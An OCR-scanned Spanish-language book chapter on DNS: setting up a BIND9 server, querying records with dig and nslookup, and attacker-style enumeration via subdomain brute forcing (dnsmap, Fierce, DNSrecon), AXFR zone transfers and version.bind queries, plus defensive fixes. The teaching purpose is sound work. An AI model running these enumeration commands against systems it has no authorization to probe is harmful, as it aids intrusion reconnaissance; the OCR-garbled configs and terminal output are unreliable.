internet se consigue toda la colección gratis en formato PDF. Cada revista contiene un artículo llamado 


Serie raw, que trata a fondo uno de los protocolos. 
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GNU nano 2.2.6 firchivo: named. conf, local 


Do any local configuration here 


Consider adding the 1918 zones here, if they are not used in your 
organization 
include "/retesbind/zones. rfc1918" 


AÑ 2 "hackersenlaweb. net” 1 
type master 
file "setesbind/db.hackersenlaveb.net' 


0.168,192 
type master 
file "retc/rbinds/db.192,168.0" 


El Mundo de la Programacion en tus Manos...! 


A Ver ayuda 
salir Jus ice 54 e Sii 'egar Tx Urtograf ía 


Figura 13. La dirección IP del servidor DNS cambia según la red, 
mientras que el nombre de dominio es una elección personal. 


Una vez que guardamos y cerramos el archivo, podemos 
asegurarnos de que no se haya cometido ningún error 
de sintaxis mediante el uso del siguiente 
comando: named-checkconf. 

Si al ejecutarlo no devuelve nada, significa que 


57 


BIND9 


no se ha cometido ningún error, mientras que, de ES EL SERVIDOR 


lo contrario, nos devolverá el archivo y la línea 
donde nos equivocamos. 


DNS MÁS 


El siguiente paso es crear los archivos UTILIZADO EN 


de configuración de las zonas. Primero 


debemos crear el archivo dhb.hackersenlaweb. INTERNET 


net a partir de dhb.local, ejecutando cp db.local 
db.hackersenlaweb.net. 

Luego procedemos a editarlo con Nano, Vi, Emacs o cualquier 
otro editor de texto. 

En este archivo reemplazamos localhost por el nombre del servidor 
(en este caso, midns) y en lugar de la IP 127.0.0.1 colocamos la del 
servidor (192.168.0.111) o la que corresponda según nuestra red. 

Es probable que en este momento no se comprenda el contenido 
del resto del archivo. En las próximas secciones de este capítulo se 
explicarán todos los registros DNS. 
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GNU nano 2.2.6 firchivo: db.hackersenlaueb.net 


; BIND data file for local loopback interface 


STTL 604800 
IM SODA nidns. root.nidns. ( 
2 Serial 
604800 ; Refresh 
86400 Retry 
2419200 ; Expire 
604800 ) : Megative Cache TIL 


midns. 


192.168.0.111 


Guardar E Leer Fich =P » Cortar Te EB Pos actual 


Justificarflf Buscar PegarTxt Ortografía 


Figura 14. También podemos elegir el nombre 
del servidor DNS según nuestro propio gusto. 


Resta crear el archivo de configuración para la segunda zona. Lo 
crearemos a partir de db.hackersenlaweb.net (con el comando: 
cp dh.hackersenlaweb.net db.192.168.0) y lo editaremos. Simplemente 
debemos modificar las últimas dos líneas, tal como muestra la Figura 
15. El número 111 corresponde al último número de la IP del servidor 
DNS, mientras que el tipo de registro debe ser PTR. 

Las últimas dos líneas del archivo deberían quedar de este modo: 


o IN NS midns.hackersenlaweb.net. 
111 IN PTR midns.hackersenlaweb.net. 


Para asegurarnos de que no cometimos ningún error de sintaxis 
en la edición de estos dos últimos archivos, podemos ejecutar los 
siguientes comandos: named-checkzone hackersenlaweb.net /etc/bind/ 
db.hackersenlaweb.net y named-checkzone 0.168.192.in-addr.arpa /etc/bind/ 
db.192.168.0. 

Si están escritos correctamente obtendremos un OK; de lo 
contrario, aparecerá cuál es el error. 
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Archivo: db.192.168.0 


BIND data file 
5TttL 604800 
serial 


Refresh 
Retru 


Expire 
Negative Cache TT 


nidns .hackersenlaveb., net 
A 


E Ver ayuda El Guardar 


Justificar lusca 5 , PegarTxt 


is actual 
Ortograf ía 


Figura 15. Se debe tener cuidado a la hora de escribir 
la IP del servidor DNS en los diferentes archivos de configuración. 


Terminamos con la configuración de BIND9. 
Es necesario reiniciar el servicio cada vez que 
realizamos un cambio en su configuración, por 
lo tanto, debemos ejecutar el comando service 
bind9 restart. 

Para saber si ha quedado bien, podemos 
realizar una prueba sencilla. En la terminal de 
nuestro Ubuntu Server, ejecutamos el siguiente 
comando: dig hackersenlaweb.net. 

La respuesta debe ser similar a la que se 
observa en la Figura 16. 


D -ACERCA DE BIND 


AL FINALIZAR LA 
CONFIGURACIÓN 
DE BIND9 DEBEMOS 
REINICIAR EL 
SERVICIO 


17 


BIND (Berkeley Internet Name Domain) fue creado en la década del 80 por estudiantes de la Universidad 


de Berkeley, California. Más tarde, Paul Vixie ayudó a fundar la ISC, organización responsable del man- 


tenimiento de BIND. El desarrollo de BIND9 presentó grandes mejoras, ya que el código fue escrito casi 


desde cero e incorporó nuevas funcionalidades. 
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sheyBus-shey:/etc/bindó dig hackersenlaweb. net 


DiG 9.8.1-P1 hackersenlaweb.net 
global options: +cmd 


Got ansuer 
>HEADER opcode: QUERY tatu MOERROR, id: 17235 
flags: qr aa rd ra; QUERY: 1, ANSUER: 1, AUTHORITY: 1, ADDITIONAL: O 


QUESTIOM SECTIOM 


hackersenlaweb.net 


SECT ION 
aweb.net 604890 192.168.0.111 


AUTHORITY SECTION 
tackersenlaveb .net 604800 


Query tine: 4 nsex 

SERVER: 192.168.1.111853(192.168,1.111) 
WHEN fug 21 01:03:49 2013 

nS6 Uk ? 


heyRus-shey:/etcbindS 


Figura 16. Si nuestra instalación de BIND9 fue un éxito, el comando 
que ejecutamos tiene que devolvernos una respuesta como esta. 


Recordemos que hemos creado y configurado una zona para 
que nuestro dominio pueda resolverse a la inversa (es decir, si 
preguntamos por la IP del servidor DNS, debe responder que 
pertenece a midns.hackersenlaweb.net). Podemos verificar si esto 
funciona con el comando: dig -x 192.168.0.111, y la respuesta debe ser 
la que muestra la Figura 17. 


heyBus-shey:/etesbind5 dig -x 192.168,0,111 


) DIG 9,0,1-P1 <c>> -x 192,168,0,111 
global option «cmd 
Got ansuer 
)MEADER<<- opcode: QUERY, status: MOERROR, 1d: 27003 
flags: qr ad rd ra; QUERY: 1, ANSUER: 1, AUTHORITY: 1, ADDITIONAL: O 


QUESTION SECTION 
¿111,0,160,192. in-addr arpa 


AMSUER SECTION 
111,0,168,192, in-addr arpa. 6041800 IM PTR midns .hackersenlaveb. net 


AUTHORITY SECTION 
3,168,192. 1n-addr arpa, 604800 IN S midns .hackersenlaveb,net 


Query tine: 4 nset 

SERVER: 192,168,1,111153(192,168.1,111) 
WHEM: Wed fug 21 01:05:39 2013 

MSG SIZE rcud: 96 


sheyBus-shey:/ete/bind9 _ 


Figura 17. Tal como configuramos, la IP 192.168.0.111 
corresponde a midns.hackersenlaweb.net. 
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Herramientas 


Hasta aquí hemos aprendido la estructura y el 


funcionamiento de este protocolo. Ahora, vamos CON DIG REALIZAMOS 
a introducirnos en el análisis de los registros que CONSULTAS A LOS 
contienen los servidores DNS. Aunque contamos 

con muchas herramientas para hacerlo, nos SERVIDORES DNS 
centraremos en dos de ellas: Dig y Nslookup. Y OBTENEMOS 


INFORMACION 

Dig 

Dig es una herramienta de línea de comandos -; , 
para realizar consultas a los servidores DNS y obtener información 
acerca de ellos. Entre los datos que podremos ver se encuentran las 
direcciones IP asociadas a sus nombres de dominio y servidores de 
correo (si los hay). Dig se encuentra en sistemas Linux y lo hemos 
utilizado en Ubuntu Server para comprobar si nuestro servidor DNS 
funcionaba de forma correcta. Esta vez lo vamos a usar desde otra 
distribución Linux, BackTrack, especialmente preparada para realizar 
auditorías de seguridad. Esta distribución cuenta con una gran cantidad 


de herramientas útiles en lo que respecta a seguridad informática, 
y trataremos algunas de ellas a lo largo del libro. 


Figura 18. Realizamos la consulta dig ns dominio.com 
y obtenemos una respuesta con los nombres de los servidores DNS. 
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Analicemos la Figura 18. La consulta que realizamos es: dig ns 
dominio.com. Con ns (nameserver) estamos especificando el tipo de 
consulta: queremos saber cuáles son los servidores DNS del dominio 
en cuestión. Dentro de la respuesta que recibimos, en primer lugar 
se nos dan unos detalles técnicos (entre ellos, el dominio consultado, 
la versión de Dig que estamos utilizando, etcétera). En QUESTION 
SECTION tenemos el dominio, la clase (IN) y el tipo (NS) de consulta 
que realizamos. Por último, en ANSWER SECTION obtenemos los datos 
que queremos saber: en este caso, el dominio consultado tiene dos 
servidores DNS: ns0.dominio.com y ns-3a.dominio.com. 


Nslookup 


Esta herramienta también es de línea de comandos y viene instalada 
en Windows. Podemos usarla con el comando nslookup desde la terminal 
(CMD). Para hacer una simple comparación con 
Dig, también vamos a realizar una consulta 


NSLOOKUP ES UNA que nos diga cuáles son los servidores DNS 
HERRAMIENTA DE pertenecientes al dominio consultado. 

, Con el comando nslookup accedemos a la 
LINEA DE COMANDOS herramienta desde la terminal. El primer paso 
PARA HACER es indicar el tipo de consulta: set q=ns. Al igual 


que con Dig, la consulta es nameserver (NS) 


CONSULTAS A LOS DNS para saber cuáles son los servidores DNS. 


Luego, indicamos el nombre del dominio del 
Re AS cual queremos saber estos datos, y ya podremos 
obtener una respuesta. Dado que el dominio que usamos es el mismo 
que consultamos con Dig, vemos de nuevo los dos servidores DNS: 
ns-3a.dominio.com y ns0.dominio.com. 


BACKTRACK 


Es la distribución Linux de seguridad informática más conocida en el ámbito, desarrollada por grandes 
profesionales. Actualmente está en su versión 5 R3 y cuenta con una enorme cantidad de herramientas 
para realizar auditorías de seguridad. Su sitio web es www.backtrack-linux.org y su foro oficial cuenta 
con una sección para la comunidad de habla hispana. 
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Figura 19. Realizamos la consulta a un dominio mediante 
NsTookup para saber cuáles son sus servidores DNS. 


Las dos herramientas son buenas y sirven para hacer este tipo 
de apálisi > sa : 


(USERS | 2. SERVIDORES DNS 


hackersenlaweb.net IN A  221.59.106.72 
IN A  221.59.106.74 


La herramienta Dig consulta por defecto el registro A si realizamos 
una petición simple como dig dominio.com, tal como se observa en la 
Figura 20. Esta vez consultamos a un dominio, que en ANSWER SECTION 
nos mostró tres direcciones IP diferentes asociadas al mismo. 


Figura 20. En este caso hay tres direcciones IP 
diferentes asociadas a un mismo dominio. 


Con Nslookup la consulta se hace de otra manera. Como vimos, con el 
comando nslookup desde la terminal accedemos a ella; primero indicamos 
que la consulta es de tipo A (set q=a) y luego el dominio a consultar. 

En este caso, tenemos asociadas cinco direcciones IP diferentes. 


5 UN 


El protocolo TCP, a diferencia de UDP, es orientado a conexión. Esto quiere decir que necesita establecer 


una comunicación para poder transferir datos, algo que lo vuelve más lento que UDP pero más seguro. 
j : : F anión 11 
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Figura 22. Consulta de tipo NS con Dig a un dominio 
asociado a seis servidores de nombres. 


SOA 


El registro SOA (Start of Authority) contiene datos que pueden 


resultar sumamente interesantes. Cuando instalamos y configuramos 


BIND9, creamos un archivo llamado db.hackersenlaweb.net que, en 
la práctica, viene a ser este registro, de contenido similar al siguiente: 


E IN SOA midns.net. root.midns.net. ( 


2011060202 ; Serial 

3600 ¡ Refresh 

1200 ¡ Retry 

432000 ¡ Expire 

600 ) ¡Negative cache TTL 


Los datos que vemos son los siguientes (nótese que algunos tiempos 


están en segundos): 


e root.midns.net: es el contacto con el administrador de la zona 


(el primer punto se reemplaza por el arroba: rootOmidns.net); 


e Serial o número de serie: número que se incrementa cada vez que 


se modifica algún registro de la zona (los servidores secundarios 
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consultan cada cierto tiempo el serial del servidor primario para 
saber si deben actualizarse o no); 

e Refresh: tiempo (segundos) que tiene que esperar un servidor secundario 
para ponerse en contacto con uno primario y revisar el serial de 
su registro SOA (en caso de estar desactualizado, se actualizará); 

e Retry: define el tiempo (segundos) que un servidor DNS 
secundario espera para volver a intentar una transferencia de zona 
(actualizarse) en caso de que la primera haya fallado; 

e Expire: tiempo (segundos) de validez para la información de un 
servidor DNS secundario. Si luego de la última transferencia de zona 
este tiempo es superado y no ha podido actualizarse nuevamente, el 
servidor descartará su información; 

e Negative cache TTL: establece el Time To Live (tiempo de vida) de 
una respuesta negativa (cuando un servidor contesta que un registro 
no existe en la zona). 


Figura 23. Consulta de tipo SOA con la herramienta 
Nslookup a un determinado dominio. 


Para la demostración de este registro utilizamos Nslookup. Aquellos 
que prefieran usar Linux deben utilizar el comando dig SOA dominio.com. 


MX 


El registro Mail eXchange (intercambio de correo) especifica el 
servidor encargado de procesar los correos electrónicos del dominio. 
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En caso de que haya más de un servidor, se establece un orden de 
preferencias indicado con un número. Si una aplicación intenta enviar 
un correo a este dominio, intentará conectarse en primer lugar con el 
servidor que tenga el número de preferencia más bajo. 


IN MX 8  mail-2.dominio.com. 
IN MX 2  mail.dominio.com. 


En la Figura 24 podemos ver un ejemplo de consulta MX a 
un dominio que posee dos servidores de intercambio de correo. 
Cuando se envía un mail a través de internet, el agente de 
transferencia de correo solicita el registro MX del dominio destino 
(por ejemplo, si el correo es shey.x70gmail.com, se solicita el registro 
MX a gmail.com). La respuesta recibida contiene los servidores de 
intercambio de correo asociados a dicho dominio, junto al número 
de preferencia. En primer lugar, intentará conectar y enviar el mail 
al servidor con el número más bajo. En el caso de la Figura 24, se 
enviaría a mail. dominio.com, que tiene el número dos. 


Figura 24. Con el comando dig MX dominio.com 
obtenemos los servidores de intercambio 
de correo asociados al dominio consultado. 
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Otros registros 


Hasta aquí hemos tratado cuatro registros importantes: A, NS, SOA 
y MX, pero no son los únicos. CNAME (Canonical NAME) es otro registro 
DNS usado para asociar más de un nombre a un solo servidor con una 
única dirección IP. Es útil si se corren múltiples servicios, de modo 
que cada uno de ellos podría tener su propio nombre, por ejemplo: 
ftp.dominio.net, mail.dominio.net, www.dominio.net, etcétera. 

Otro registro muy común es PTR (PoinTeR), que cumple la función 
contraria al registro A: asocia direcciones IP a nombres de dominio y 
sirve para su resolución inversa. En la instalación de BIND9 creamos 
un registro PTR y comprobamos si funcionaba correctamente con el 
comando dig -x 192.168.0.111. 

Existen aún más registros DNS pero no siempre son creados, lo que 
significa que, muchas veces, consultaremos a un dominio sobre estos 
registros y no recibiremos la respuesta exacta a nuestra consulta. Algunos 
de ellos son: SRV (SeRVice), LOC (LOCation) y HINFO (Host INFOrmation). 

Desde el punto de vista de un atacante, mediante las consultas a 
los registros de un servidor DNS se puede obtener información muy 
interesante sobre el dominio que se esté analizando. Sin embargo, 
podríamos preguntarnos: ¿se puede llegar aún más lejos? 


Técnicas de extracción 
de datos 


Se dice que si un intruso no puede entrar por la puerta, ingresa 
por la ventana. Los DNS son una herramienta bastante utilizada por los 
atacantes para obtener información sobre la estructura interna de una 


DN DOMAINKEYS IDENTIFIED MAIL 


En la actualidad es demasiado común encontrarnos con correo electrónico no deseado, SPAM y remiten- 
tes falsificados. El resultado de la fusión entre DomainKeys e Identified Internet Mail fue DKIM, un 


sistema que verifica si el correo que recibimos proviene realmente de donde dice provenir. 
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web y facilitar un acceso. La idea es aprender algunas de estas técnicas 
con el objetivo de saber cómo proteger nuestro sistema. 

Ya sabemos cómo obtener direcciones IP, servidores DNS y de 
intercambio de correo, datos del registro SOA y otra información 
asociada a un dominio, mediante consultas a los registros A, NS, 

SOA y MX. Pero podemos llegar aún más lejos en lo que respecta a la 
obtención de datos a través de los DNS. 


Extracción por fuerza bruta 


En internet podemos encontrar sitios web muy grandes, con una 
inmensa cantidad de contenidos. Sin ir más lejos, podemos nombrar a 
Google, desde cuya página principal podemos acceder a varios de sus 
servicios, como el traductor, imágenes, videos, mapas, noticias, correo 
electrónico, etcétera. Cuando ingresamos al buscador lo hacemos 
desde www.google.com, pero si accedemos a los diferentes servicios 
podemos observar que la dirección URL cambia. Por ejemplo, la página 
web de Google Maps es maps.google.com; en el caso de los videos, 
video.google.com; el correo electrónico, mail.google.com; noticias, 
news.google.com. Lo mismo ocurre con los demás servicios. El 
dominio sigue siendo google.com, pero a esos nombres que varían 
se los llama subdominios. 


ct, 
Do tacto: de Gente Le 
+ poca 
Google 
a A 1 O AL A LIO A 


Figura 25. Cada servicio de Google tiene su correspondiente 
subdominio, lo que organiza la administración y el contenido. 
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Desde el punto de vista del hacker, esos subdominios comunes 
y corrientes no son de importancia, ya que no aportan ningún dato 
significativo para llevar a cabo un ataque. Sin embargo, el hecho 
de que existan presenta la posibilidad de que haya otros que no 
se ven a simple vista, pero que valgan la pena encontrar. Muchos 
administradores crean subdominios, por ejemplo de paneles de 
administración, inaccesibles desde la página web pero fáciles de 
encontrar con un poco de esmero. 

Un subdominio interesante para un hacker podría ser, lógicamente, 
la zona de administración, el correo, intranet, FTP, webmail, etcétera. 
Cualquier sitio web, grande o pequeño, con subdominios visibles o 
no, puede contener algunos de los nombres mencionados. Ahora bien, 
si no se ven... ¿cómo los descubrimos? Un modo de hacerlo sería ir 
probando manualmente desde el navegador los posibles subdominios. 
Por ejemplo, si queremos encontrar el panel de administración, 
empezamos con admin.dominio.com, administración.dominio. 
com, adm.dominio.com, y así sucesivamente con todas las 
posibilidades que se nos ocurran, hasta que, si tenemos suerte, se 
muestre lo que queremos en lugar del error 404. Está claro que esta 
manera es realmente tediosa, además de consumirnos mucho tiempo, 
e incluso puede que aunque intentemos varias combinaciones 
diferentes no demos con el subdominio que queremos encontrar. 

Lo ideal sería contar con una herramienta que, al pasarle 
como parámetro el dominio objetivo, nos dé una lista con sus 
correspondientes subdominios: de eso se trata la técnica conocida 
como DNS Brute Force (fuerza bruta). En esta se usa como base 
un archivo de texto que contiene muchas combinaciones de letras, 

y la herramienta se ocupa de comprobar si existe cada uno de los 
subdominios que va formando en el dominio pasado como parámetro. 


O PROGRAMAR UN DNS BRUTE FORCE 


No es necesario saber mucho de programación para crear un simple DNS Brute Force. Si tenemos cono- 
cimientos en PHP, por ejemplo, podemos programar uno sencillo con una lista de posibles subdominios 
y un script PHP que reciba de parámetro el dominio a analizar e intente conectar sin errores a cada uno 


de los nombres de la lista, y en caso de que exista imprimirlo en pantalla. 
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En la nombrada distribución Linux BackTrack contamos con varias 
herramientas para realizarlo, como dnsmap. 


« rootibt: ¡pentest/enumeration/dns/dnsmap 


Figura 26. Dnsmap es una de las herramientas que encontramos 
en BackTrack para realizar un ataque de DNS Brute Force. 


Si ingresamos a la ubicación /pentest/enumeration/dns/dnsmap/ 
encontramos el archivo wordlist_TLAs.txt, que tiene las combinaciones para 
realizar un ataque de fuerza bruta. Es recomendable utilizar también las 
demás herramientas que tenemos a disposición en BackTrack y que sirven 
para esto (más adelante, en la sección Amigos dispuestos a ayudar de 
este mismo capítulo, trataremos algunas de ellas). 

Para hacerlo desde dnsmap, nos situamos en la ubicación dicha, 
desde la terminal, y ejecutamos ./dnsmap dominio.net -w wordlist_TLAs.txt 
(se pueden agregar más parámetros). Luego esperamos a que finalice el 
proceso y se muestren los subdominios hallados en nuestro objetivo. 

Esta última técnica, sin embargo, tiene sus desventajas: el DNS Brute 
Force consume tiempo y no garantiza mostrarnos todos los nombres que 
existan en el objetivo. No habría nada mejor que una técnica que nos 
muestre de manera rápida absolutamente todos los subdominios... ¿existe? 


Paseo por los registros 


Seguimos con la idea de obtener los subdominios de un objetivo. 
Otro modo de hacerlo es utilizar la técnica AXFR, siglas que hacen 
referencia a la transferencia de zonas. 
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Al comienzo del capítulo aprendimos cuáles eran los servidores 
DNS primarios y secundarios, y luego vimos que en el registro SOA 
se especifica cada cuánto tiempo un servidor secundario consulta el 
serial de uno primario para saber si debe realizar una transferencia 
de zona y actualizarse. Lo interesante es que estos servidores se 
transfieren lo que nosotros queremos. Existe la posibilidad de 
hacernos pasar por servidores DNS secundarios y solicitar al primario 
una transferencia de zona, de modo tal que nos envíe todos los 
subdominios de nuestro objetivo. 


¿me enviás las zonas? ¿me enviás las zonas? 
€_A<MIMIM¿MMM>M<>A6 € x= 
y Z o 
si, las zonas son... si, las zonas son... < 
< A —_—_———————————Foo——————Á 
PC hacker Servidor DNS Servidor DNS 
primario secundario 


Figura 27. La técnica AXFR se produce cuando el atacante 
solicita una transferencia de zonas a un servidor 
DNS primario, tal como lo haría un servidor secundario. 


Para realizar una transferencia de zona o AXFR , 
vamos a usar las herramientas Dig y Nslookup. LA TECNICA 

Empecemos por Dig. Lo primero que tenemos AXFR PERMITE 
que hacer es averiguar los servidores DNS del 
objetivo, para lo cual ejecutaremos el comando OBTENER 
dig ns dominio.com.ar, tal como lo hicimos en LOS SUBDOMINIOS 
las secciones anteriores. Elegimos uno de los 
servidores que nos imprima en la terminal y, DE UN OBJETIVO 
acto seguido, realizamos la transferencia de 
zonas con el siguiente comando: dig Oservidordns. 
com dominio.com.ar AXFR. A continuación del E escribimos el servidor 
DNS que elegimos, luego el dominio a consultar y al final indicamos 
qué es un AXFR. 
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Figura 28. En este caso el servidor es vulnerable a AXFR, por lo que, 
en un segundo, obtuvimos subdominios interesantes de FTP y mail. 


Mediante Nslookup también podemos realizar la técnica de AXFR. 
Accedemos desde la terminal y averiguamos cuáles son los servidores 
DNS (set q=ns) y el dominio. Nos decidimos por uno de los servidores 
y lo indicamos ejecutando server servidordns.com. Luego, listamos los 
subdominios con el comando ls -d dominio.com. 


M Asrmnatrador Hmbolo del paterna - mlookup (a) | 


EN 
14 


an. ar 7] 
7200 2BUUBIO 86140? 


Figura 29. Mediante la herramienta Nslookup también 
se puede realizar un AXFR y obtener los subdominios del objetivo. 


Quizás nos preguntemos... si es tan fácil obtener los subdominios con 
esta técnica ¿para qué existen las demás? Para desgracia del atacante, un 
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AXFR solo puede lograrse si el servidor DNS está mal configurado, 
de modo que permita transferir las zonas a donde no debe hacerlo. 
Esta falla en los servidores DNS se conoce como Vulnerabilidad de 
Transferencia de Zona. Si el servidor está bien configurado, 
directamente va a rechazar la petición realizada por el atacante. 


MÍ Acrriristrador: Simibolo del srstema - nsloolup = 14 
he y>na Lookup 
ndo 


redetarmáis 
19 168.0,1 


Figura 30. En caso de que el servidor DNS esté bien configurado, 
nos devolverá un mensaje de rechazo de nuestra petición. 


Ahora bien, si somos nosotros los administradores y tenemos 
un servidor DNS que hace transferencias de zona a cualquier lado, 
no hay que desesperarse, porque se trata de un problema muy fácil 
de solucionar. Cuando instalamos BIND9 y creamos las zonas, editamos 
un archivo llamado named.conf.local. Lo que debemos hacer en este archivo 
es limitar las transferencias de zona únicamente a los servidores DNS 
secundarios. Para ello, debemos agregar a la zona la siguiente línea: allow- 
transfer [ 192.168.0.102;); (entre llaves va la IP del servidor secundario). 


Zone “hackersenlaweb.net”( 
type master; 
file “/etc/bind/db.hackersenlaweb.net”; 
allow-transfer ( 192.168.0.102; ); 
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Clase CH (CHAOS) 


Es probable que, al obtener las respuestas a nuestras consultas, 
hayamos notado en todas ellas las letras IN y a su derecha el tipo de 
consulta (A, NS, MX o cualquier otro). Eso significa que estos registros 
pertenecen a la clase IN (INTERNET). También existe la clase CH 
(CHAOS), que contiene registros internos. 

Un dato interesante que podríamos obtener a través de esta clase es 
la versión de BIND que está corriendo el servidor DNS. Las diferentes 
versiones de este software podrían tener fallas de seguridad y ser 
explotadas, beneficiando al atacante. Para saber si es vulnerable o no 
un determinado servidor, primero hay que saber qué versión de BIND 
tiene, para lo cual hay que consultar la clase CH. 

Realicemos esta consulta mediante Dig. El dominio objetivo, en este 
caso, va a ser el que creamos en nuestra instalación de BIND: desde la 
terminal ejecutamos dig hackersenlaweb.net version.bind chaos TXT. Primero 
indicamos el dominio objetivo, luego version.bind (el registro que tiene 
la versión de BIND), luego chaos (la clase que contiene este registro) 

y por último TXT (porque estamos solicitando información textual). 


 rootabt: — 


Figura 31. Realizamos una consulta a la clase chaos 
para averiguar la versión de BIND; en este caso, es la 9.7.1-P2. 


Modificar este dato es simple y útil, ya que si consigue consultar 
esta clase, el supuesto atacante no logrará ver lo que desea. Para 
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modificar la versión vamos a editar el archivo named.conf.options, que se 
encuentra en /etc/bind/. Agregamos la siguiente línea: version “nada mejor 
que hacer?”; y reiniciamos el servicio de BIND. Cuando consultemos, 
saldrá la versión que nosotros pusimos en lugar de la real. 

El registro hostname.bind nos muestra el nombre de la máquina 
que estamos analizando. La consulta es similar a la anterior, excepto 
en que cambia el registro que consultamos: en lugar de version.bind 
escribiremos hostname.bind, para que quede de la siguiente manera: 
dig hackersenlaweb.net hostname.bind chaos TXT. Podemos ver la respuesta 
en la Figura 32: el nombre del host es us-shey, tal como fue 
especificado en la instalación de Ubuntu Server del Capítulo 1. 


Figura 32. Realizamos una consulta a la clase chaos 
para averiguar el nombre de la máquina que estamos analizando. 


Amigos dispuestos a ayudar 


La enumeración DNS es clave para la etapa de recopilación de 
información en una auditoría de seguridad. Ahí es donde obtenemos 
datos más específicos y útiles para un ataque, como las direcciones IP 
asociadas a los servicios de FTP, mail, etcétera. Tendremos que llevar a 
cabo todas las técnicas de extracción de datos aprendidas hasta ahora, 
con el objetivo de obtener toda la información posible sobre 
los servidores DNS pertenecientes al dominio en cuestión. 
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Si bien hemos hecho todo esto mediante Dig y Nslookup, también 
tenemos otros muy buenos amigos que nos van a facilitar el trabajo. 
Hablamos de las herramientas que tenemos a nuestra disposición, 
tanto online como de escritorio, dentro de la suite BackTrack. 


Recursos online 

Varios sitios web ofrecen la herramienta Whois (por ejemplo, 
whois.domaintools.com), con la cual obtenemos datos sobre el 
registro del dominio que consultemos. Por otro lado, tenemos la página 
de DNSstuff (www.dnsstuff.com/tools), con una gran cantidad de 
herramientas para el análisis de DNS, algunas pagas y otras gratuitas. 
Entre ellas encontramos Traceroute, que sirve para saber cuántos 
dispositivos atraviesa una consulta desde su origen hasta su destino 
(como routers o firewalls), y DNS Traversal, para verificar cuántos 
servidores dan la misma respuesta a nuestra consulta. 


Figura 33. DNSstuff (www.dnsstuff.com/tools) es un sitio 
web que ofrece muy buenas herramientas para el análisis de DNS. 


Otra herramienta online interesante es Domain Dossier, que 
encontramos en el sitio www.niclookup.com. Ofrece la posibilidad 
de elegir el tipo de análisis que se va a realizar, por ejemplo: Whois 
de dominio y red, Traceroute, Escaneo de servicios, entre otras. 
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Un recurso muy útil para Firefox es el plugin 
Passive Recon. Una vez que lo instalamos, EXISTEN MUCHAS 
cuando presionamos el botón secundario del HERRAMIENTAS 
mouse en alguna parte del sitio que queremos 
analizar, podemos ver un nuevo menú ONLINE Y DE 
correspondiente a este plugin. Las herramientas ESCRITORIO PARA EL 
que contiene se dividen por categoría (DNS, S 
Email, Enumeration, Google, IP y Whois) ANALISIS DE DNS 


y según el tipo de análisis se consultará 

determinada web (algunas de las que se utilizan 

son www,.robtex.com, www.intodns.com, www.domaintools.com 
y www.centralops.net). 


Herramientas de escritorio 

Tal como mencionamos antes, existen otras herramientas 
interesantes además de Dig y Nslookup, que podemos utilizar 
cómodamente desde la suite Backtrack. En esta sección trataremos 
dos de ellas: Fierce y DNSrecon. 

Fierce es una aplicación programada en Perl que podemos 
ejecutar tanto en Windows como en Linux, usando un intérprete de este 
lenguaje. La obtenemos de su web oficial (http://ha.ckers.org/fierce) 
y, en BackTrack, la encontramos en la categoría DNS Analysis, dentro de 
Information Gathering. 

Empezando por lo simple, si bien Fierce tiene muchos parámetros 
interesantes, podemos empezar por el más sencillo: perl fierce. 
pl -dns dominioaescanear.com. Con esto nos mostrará, en primer 
lugar, los servidores DNS del dominio y luego intentará realizar 
un AXFR a todos; en caso de que no pueda, tratará de obtener los 


DN DNSSEC 


Le 


"VAS 


Domain Name System Security Extensions (DNSSEC), tal como indica su nombre, es una extensión de 


seguridad para los DNS. El objetivo es verificar la autenticidad de la respuesta a una consulta, es decir, 


que provenga realmente de donde dice provenir. Cabe aclarar que DNSSEC no cifra las transferencias 


de datos establecidas entre un cliente y un servidor. 
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subdominios usando un diccionario de palabras e imprimirá en 
la terminal todos los que encuentre. 

Otro parámetro interesante es —-range, que sirve para escanear un 
rango de direcciones IP internas, por ejemplo -range 192.168.1.0-255. 
Este parámetro debe ir acompañado de -—dnsserver, usado para 
especificar un servidor DNS en particular. El comando, finalmente, 
sería: perl fierce.pl -range 192.168.1.0-255 —dnsserver ns0.dominio.com. 

Es probable que encontremos datos interesantes relacionados 

con nuestro dominio objetivo. Como mencionamos antes, Fierce 
utiliza un diccionario de palabras para encontrar subdominios, y 

en su correspondiente carpeta encontramos esa lista bajo el nombre 
hosts.txt, a la cual podemos editar y agregar más palabras. De todos 
modos, si tenemos otro diccionario que consideremos más completo, 
podemos usarlo con el siguiente comando: perl fierce.pl -dns dominio. 
com -wordlist mihosts.txt. 


x« rootígbt: ¡pentest/enumeration/dns/fierce 


e Edit View Ter 


TE 1 rootBbt, ¡pentestienu 


Figura 34. Fierce (http://ha.ckers.org/fierce) 
es una excelente herramienta para el análisis de DNS. 


Seguimos con la herramienta DNSrecon, programada en Python. 
Podemos encontrarla en BackTrack, en la misma categoría que Fierce. 
El parámetro -d específica el dominio a escanear, mientras que —t 
indica el tipo de análisis (las opciones son axfr para testear los 
servidores DNS contra una transferencia de zonas, brt para obtener 
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los subdominios usando un diccionario y std para la obtención de 
registros SOA, NS, A, AAAA, MX y SRV). Tenemos aún más parámetros 
y tipos de análisis, que podemos ver con el comando --help. 
Finalmente, armamos un comando con los siguientes parámetros: 
dnsrecon.py -d dominio.com -t std (std puede ser reemplazado por 
cualquier otro tipo de análisis, como por ejemplo axfr). 

Estas dos herramientas no son las únicas utilizadas para el 
análisis de los DNS dentro de la suite BackTrack y hay muchas otras 
recomendables, como DNSenum, DNSmap o DNSwalk. 


ma RESUMEN 


En este capítulo aprendimos desde cero el funcionamiento de los DNS, conociendo su estructura jerár- 


quica, los tipos de consulta (recursiva e iterativa) y el proceso de resolución de nombres. Instalamos el 
servidor DNS BIND9 y aprendimos a manejar las herramientas Dig y Nslookup para analizar registros. 
Realizamos técnicas como DNS Brute force, AXFR y otras, de utilidad para la enumeración de DNS. 
Finalmente, aprendimos a proteger nuestro sistema de atacantes que usan estas mismas técnicas. 
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Actividades 


TEST DE AUTOEVALUACIÓN 


¿Por qué son necesarios los DNS? 

¿Cuál es la diferencia entre una consulta recursiva y una iterativa? 
¿Cómo está compuesta la estructura jerárquica de los DNS? 
¿Cómo se realiza el proceso de resolución de nombres? 

¿Qué es BIND? 

¿Para qué sirven las herramientas Dig y Nslookup? 


¿Qué tipos de datos contienen los registros A, NS, SOA y MX? 


0 JJ Of 0d Bb Y N FP 


¿Por qué puede ser útil para un atacante obtener los subdominios de un 
objetivo? 


EJERCICIOS PRÁCTICOS 


1 Instale un servidor DNS BIND9. 
2 Consulte el registro SOA de un dominio mediante Dig y Nslookup. 


3 Realice un ataque de DNS Brute Force mediante la herramienta dnsmap en 
Backtrack. 


